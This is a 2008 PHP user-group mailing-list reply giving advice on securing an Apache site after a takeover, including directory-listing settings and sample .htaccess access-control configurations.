NYCPHP Meetup

[Dan Horning]

On Sat, 2008-10-11 at 09:42 -0400, David Krings wrote:
> mikesz at qualityadvantages.com wrote:
> > I checked my test system also and when I do a directory the /xml
> > folder, it shows me the content of the folder which is yet another
> > outcome unexpected.
> > 
> 
> There is a setting in the Apache config that prevents the listing of 
> directories. In a production system that should be always turned off.
> Also, IIRC you can specify the name of the access file in the config as well, 
> so it may not always be .htaccess, but I cannot think of any plausible reason 
> to change that. But that may be worthwhile to check out.
> 
> Oh, and at your earliest convenience change the hosting company. If they 
> cannot tell you how such a takeover happened then I wonder what they charge 
> you money for. Anyone with a PC can do that type of hosting...

On one hand i can understand how the host wouldn't know exactly how the
files got there - but the file ownership and logs should give much more
information away and they should know if it was a shell attack, a remote
file inclusion, or any number of common attacks. 

from your side though - are you using a common code base or module that
might be vulnerable, or maybe an old version of a now patched software
setup? if you are, what i use then might be something to look for in a
web host - we use an intrusion detection system that combines
mod_security with some well written rules along with some other software
that monitors everything. With that in place although I'm sure there is
still a way for someone to find a way into your system, it's incredibly
less likely, and the automated attackers would most certainly not work. 

to answer your question about the .htaccess file - there is also a
possibility that the host does not have all of the AllowOverride
directive active for your hosting account. in that case some items would
work and others wouldn't.

next up the content of your .htaccess
it's probably not what you wanted to do and i'm nearly positive that the
deny/allow isn't working
> -Indexes
- turns off directory listings
you may also need to change this to another name - thus triggering the
default not to be shown
> DirectoryIndex index.php 
 - that will make the only file index.php that will show up when you did
http://host/xml/ (correct me if i'm thinking the other directive it's
early) 
--------------------------------------
> Options -Indexes
> 
> order deny,allow
> 
> <files "*.*">
> Deny from All
> </files>
> 
> <files "*.*">
> Allow from 127.0.0.1 localhost
> </files>

this is a working config for something i have running
> Options -Indexes                                                                
>                                                                                 
> AuthUserFile /pathto/.htpasswd"                     
> AuthType Basic                                                                  
> AuthName "Staff Only"                                                           
> Satisfy Any                                                                     
>                                                                                 
> <Limit GET POST>                                                                
> order deny,allow                                                                
> deny from all                                                                   
> allow from some.ip.add.ress                                                        
> require valid-user                                                              
> </Limit>        

-- 
Dan Horning

American Digital Services - Where you are only limited by imagination.
direct 1-866-493-4218 . main 1-800-863-3854 . fax 1-888-474-6133
dan.horning at planetnoc.com
http://www.americandigitalservices.com